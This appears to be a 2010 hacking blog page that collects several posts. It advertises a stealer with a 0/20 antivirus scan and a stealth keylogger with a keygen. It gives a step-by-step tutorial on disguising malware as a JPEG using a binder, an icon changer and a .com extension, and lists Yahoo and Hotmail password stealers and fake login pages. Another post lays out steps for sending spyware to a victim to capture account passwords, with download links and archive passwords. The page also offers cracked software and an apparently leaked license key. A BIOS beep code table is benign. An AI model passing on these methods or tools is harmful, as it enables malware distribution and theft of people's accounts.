Disable TaskManager
File Binder
Icon Changer
Stealers
Fake Error
Force Steam Login
Nice GUI
Delete Cookies (FF & IE)
Delete Cache (FF & IE)
Blocks Av Sites
Stub Updater

Server/Stub Scan:
Report date: 2010-05-09 05:08:20 (GMT 1)

File name: stub.exe
File size: 38400 bytes
MD5 Hash: 4f108d479bfc96f22de9af9d871c6294
SHA1 Hash: 3bf4d9538380f6305be732fb01b03d4d896a960a
Detection rate: 0 on 20 (0%)
Status: CLEAN

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - -
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - -
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

Download Link


Ecodsoft Keylogger v2.1 Incl Keygen-Lz0


Ecodsoft Keylogger v2.1 Incl Keygen-Lz0



Ecodsoft Keylogger is very powerful monitoring software which could record and log all the computer activity. This key logger tool work in stealthy mode and completely invisible to other people. It could not only record key stroke but the software informations such as applications launched, websites visited, and popular Instant Messenger log.

As the best computer monitor and logger software, Ecodsoft Keylogger is very easy to use with its friendly UI, even for the beginners. After install on any PC you want, it could record and save allthe activity. So it could be excellent parent control and surveillance tool and also could work as a employee monitor.Now you could download it for free and try it easily!

Key Features:

Best keystroke recorder
» Secretly record all keystrokes typed by computer users in total stealth.

Sends the report to the specified email addresses.
» Log and save all the message on the PC, and could send to you via email secretly.

Save all the IM messages:
» Skype chat logger
» MSN Messenger logger
» Yahoo Messenger logger
» AIM logger
» ICQ logger

Record all the websites opened and other software usage history:
» Myspace log
» Facebook log
» Document open log
» Clipboard content

Take screenshot and save on the PC.
» The key logger and monitor could record screen and save as bmp files,
» so you could browse and check them anytime.

Safe to install without spam and best service!

System Requirement:
» Windows XP, Vista or NT/2000/2003/2008 Server, Windows 7

Download 5.25 MB (Setup + Ecodsoft Keylogger v2.1 Keygen-Lz0)

Code: http://hotfile.com/dl/35432952/d44dc4c/REGGOLYEKTFOSDOCE212121.rar.html
PASSWORD
smartworld


[Tutorial] Hide your Virus in a Picture File [New Method]




Items Needed:
  • Any Icon Changer
  • A Binder
  • A Brain

1) Create your virus. We shall call it 'server1.exe' for now.

[Image: server1.png]

2) Get any picture file you want to distribute.

3) Bind the 'server1.exe' and your picture file with any binder, we'll call the binded file 'virus1.exe'.

[Image: bindere.th.png]

3.5) I reccomend Easy Binder 2.0, which comes with a bytes adder and a icon extractor, aswell as some really good packing options. I've uploaded it, virus free, to: http://www.mediafire.com/?igjy4dnn0zb

4) Be sure you have 'Hide common extensions' unchecked in your Folder Options.

[Image: known.th.png]

5) Change the 'virus1.exe' to '%Picturename%.jpeg - %Email/Web Address%.com'. For example, we'll call it 'HPIC_119.jpeg - test@test.com'.

[Image: hpic.th.png]

.com works the same as .exe, except fewer people actually know that's what it really is.

6) If you plan on distributing your virus via MSN, please skip to 7. If you plan on distributing your virus via file upload sites, please skip to 8.

6.5) I reccomend Icon Extractor V3.8 FULL with Serial, that can be downloaded from this Post : Click Here


[Image: iconchange.th.png]

7) You will now need to change the icon from that ugly box. Find the picture you added to the file, and make it an icon. How? Find one of the various online Picture to Icon converters. Once your picture is a .ico, use your Icon Changer program to change the icon of the file to the .ico you just made from the picture. When you send it to people on MSN, it will show a small box of the picture inside.

[Image: msnz.th.png]

8) You will not need to change the icon from that ugly box. Using your Icon Changer program, find the .jpeg icon, and change the ugly box to the .jpeg icon.

[Image: downloadfq.th.png]

9) Conclusion. Your file will now look like a legit picture to 9/10 people. Some people do know that .com is an extension, but the average computer user will not see any difference, and will download it without hesitation.


Over 8000 icons with Icon Changer 3.8 including serial !


Over 8000 icons with Icon Changer 3.8 including serial !

Icon Changer is a software application that makes changing icons on the desktop fun and easy.
It's a hassle-free way to personalize your desktop without submerging yourself into reading books about advanced computing. Simply click the icon you want to change, point at the one you like and that's all. Why change icons? To make navigation easier, to group similar applications together, to customize and spice up your desktop, of course. Try it!.

Moreover, you can use IconChanger to change personal file icons. You can now assign an icon of your choice to each and every file on your computer. Personalize your computing experiences to make using computer a bit easier and much more convenient.

[Image: so278g.gif]


Download :


Best Hacking Collection


Best Hacking Collection 34 in 1 AIO | 137.37 MB

Contains

BlueTooth Hacking
Ethical Hacking
Google Hacks
Hack and Crack
Hack Attacks Revealed
Hack Attacks Testing How To Conduct Your Own Security Audit
Hack IT Security Through Penetration Testing
Hack Proofing Your Network Internet Tradecraft
Hack Proofing Your Network Second Edition
Hack Proofing Your Web Server
Hack The Net
Hack Xbox 360
Hackers Black Book
Hacking Firewalls And Networks How To Hack Into Remote Computers
Hacking a Coke Machine
Hacking and Network Defense
Hacking for Dummies
Hacking Intranet Websites
Hacking Techniques
Hacking The Cable Modem
Hacking The Linux
Hacking Web Applications
Hacking Windows XP
Hacking PSP
Kevin Mitnick The Art of Deception
Kevin Mitnick The Art of Intrusion
Network Security Hacks Tips and Tools For Protecting Your Privacy
PayPal Hacks
PC Hacks
Simple Hacks Addons, Macros And More
The Database Hacker Handbook Defending Database Servers
Wireless Hacking
Wireless Network Hacks and Mods for Dummies





Link Download:
Code:
http://hotfile.com/dl/41020459/2b849...part1.rar.html
http://hotfile.com/dl/41017049/0e0de...2.rar.html:12:


~`;! IP HIDER !;`~



IP HIDER 3.7 full+ license key


ip hider is a great tool that have lots of working proxy's. i found got a license key. i was searching it for a year. all of a sudden, i got a free one. heres the email i got from a company.----------------------------------------------------------------------------
Dear Mr./Mrs. ajobbalok,

This email contains your 6 months license key for IP Hider version 3.7.This license key is valid only for version 3.7 so please make sure that you have this version installed.Please follow these steps to register:

1. Make sure that you have the trial version of the software installed. In order to verify this please go to Start / All Programs / IP Hider. If the IP Hider is present that means that you have the software installed, otherwise please download and install the latest version of the application from http://www.allanonymity.com.

2. Considering that the software is installed there are two situations:

- The trial copy is expired. In this case after you start the application - you will be promoted to Buy, Uninstall or Register the software. Press Register and the registration form will start. Copy and paste the licensing information below and press OK.
- The trial copy is not expired. In this case the user interface will start normally and you should go to Register menu, the registration form will be displayed. Copy and paste the licensing information below and press Register.

3. Your license information is below. Copy and paste into the registration form only the bolded strings:

- email: ajobbalok@gmail.com" onclick="window.open(this.href);return false
- registration key: 3X6Z24NBYE29747U95QAE76PWRL347KP42KWC75U8S7WAA3CRG 8QRSD9BNDE9W9LXW8P78STGXSKJURZ​84Y5AM5YNVKA43WNR8D RKE

4. If the license key is valid, after you copy and paste the license information (email and registration key) into the registration form and press OK or Register, you should see that your copy is registered. You will also see your email address and license expiration date.

5. If you see this information then the registration process is completed.

For any technical problem please do not hesitate to contact our support team at this e-mail address: E-mail.


AllAnonymity Team
---------------------------------------------------------------------------

Hope you will enjoy your six months key!

http://rapidshare.com/files/214338187/iphider37se.exe


Hack Password Yahoo Messenger 10 [WORKING 100%]


Magic PS v1.5 SE++ [FINAL] - Hack Password Yahoo Messenger 10 [WORKING 100%]

Magic PS v1.5 SE ++ [FINAL]

MPS is a Powerfull Password Sender for
Yahoo! Messenger
MPS sends victim id & pass to your id
Work without any smtp and script
Tested on Win98-Me-NT-2000-XP-Vista-7


~`;! Downloading a website (all files) !;`~


Hey guys, just wanted to share this great program I found. It's called HTTrack.
Description
Httrack is a program that gets information from the Internet, looks for pointers to other information, gets that information, and so forth. If you ask it to, and have enough disk space, it will try to make a copy of the whole Internet on your computer. While this may be the answer to Dilbert's boss when he asks to get a printout of the Internet for some legal document, for most of us, we want to get copies of just the right part of the Internet, and have them nicely organized for our use. This is where httrack does a great job.
Direct DL Link

Pics
[Image: snap6.gif]


Hacking Msn, Yahoo, Hotmail


Main page
- Hotmail Hacking
- Yahoo Hacking
- MSN Fun Tools
- Fake Screens & Pages
- Other Hacking Tools
- Fun Tools

Page 1
MSN Chat Monitor And Sniffer
MSN Password Retriever
MSN Hacker DUC
Head **** Hotmail Hack
Hotmail Hacker XE Edition
Hotmail HAck
Hotmail Hacker
MSN Passwords
MSN Flooder
MSN Sniffer
MSN SPY Lite
Hotmail Hacker Gold
Hotmail Hacker Final
Give me Ur Pass
Hotmail Brute Forcer
MSN Password Finder
MSN Password Grabber
Hack MSN Password
Hack Hotmail Evolution
Magic Password Sender
MSN Locker
Hotmail Killer
Hot Freeze
MessenPass
Hotmail Hack
Ice Cold Reload
Hotmail Killer 2
Nuke MSN

Page 2
Yahoo Messenger Login Screen
MSN Messenger 7 Login Screen
MSN Messenger 5 Login Screen
MSN Messenger 4.6 Login Screen
Hotmail Login Screen
Fake Web Pages 2
Fake Eeb Pages 1
AOL Killer
Fake Login Hotmail
B-S Spy
Saria Fake Logins

Page 3
Yahoo Password Retrieval
Yacam
Yahoo Cracker
Yahoo Booster
Yahoo Hack!
Yahoo Password Stealer
S-H Yahoo Password Sender

Page 4
Network Password Recovery
Net BIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listening XP
Blue Port Scanner
www 2 IP
XP Killer
Sniff Password
Port Scanner
Fast Resolver
Domain Scan
Whois Domain
NetRes View
PHPbb Defacer
Angry IP Scanner
FTP Brute Forcer

Page 5
Hook Tool Box
Smart Hack Uploader
Remote Anything
Post Sage
PHPbb Attacker

Page 6
Skinner
MSN Bomber Man
Ultimate Nick PopUpz
MSN 7 Universal Patcher
Emoticons Creator
MSN Picture Crawler
Anti Status Bomb
MSN Detector
Multi MSN Loader
Kitle
Protect Lithium
Tray It
MSN Block Checker
MSN Auto Responder
MSN Virus Cleaner
MSN Dondurucu

Download From Hare
Password : downloadthis




Hacking A Yahoo Id


It is the easiest way to hack anyone's Yahoo ID's Password.

Follow these steps to hack the Yahoo ID

1. U have to make a server {spyware} given ur email id.

2. Send the server to the victim's computer anyhow.

3. When he will open it he cant realize that it was a spyware because after opening it, it will be deleted automatically.

4. After open this file, when he will go to login int his yahoo id his password and id will be send to ur given yahoo email id .

5. U can also disable his OS's many features .

There are three types of software by which u can make your own spyware {server]
U can download anyone and use it.

http://rapidshare.com/files/42244305/Y_Jacked.rar.html

http://rapidshare.com/files/42244485...r_1.1.zip.html

http://rapidshare.com/files/42244551/YAHOO_HACK.rar.htm


Beep Code Manual


Beep Code Manual, Better Than Gold Techies, American Megatrends Int. & Phoenix

(I'm IT, I use these codes to trouble shoot hardware issues at my job. Enjoy) cold.gif

BIOS Beep Codes

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS.

The two most-used brands are AMI (American Megatrends International) and Phoenix.

Below are listed the beep codes for AMI systems, and here are the beep codes for Phoenix systems.


AMI Beep Codes

Beep Code Meaning
1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps Memory parity error. The parity circuit is not working properly.
3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps Processor failure. The system CPU has failed.
6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps Virtual mode exception error.
8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short Failure in the video system.
1 long beep, 3 short A failure has been detected in memory above 64K.
1 long beep, 8 short Display test failure.
Continuous beeping A problem with the memory or video.
BIOS Beep Codes


Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix version before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes. Click here for AMI BIOS beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-2
1-1-3-3
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4
2-1-3-2 I/O port failure.
2-1-3-1
2-1-3-3 Video system failure.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-3-4-1
2-3-4-3
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-3-3
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure.
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor.


Counter

free counters

Trafic

Hacking and Computer Tip Trick, Computers, IT Forum, IT Tips, Hacking tutorials, Credit Card Hacking, Face Book Hacking, Ftp Server On Your Pc, Get Adsense, Get Email alerts, Gmail Hacking, Google Tips, Hacking YouTube, Internet Tips, IP Address, Mobile.

Partners

Pak Gsm

Bookmark

Add us to your technorati favorites
 

Hacking & Computer Tips Copyright © 2010 Hacking and Computer Tips is Designed by Hack pc tips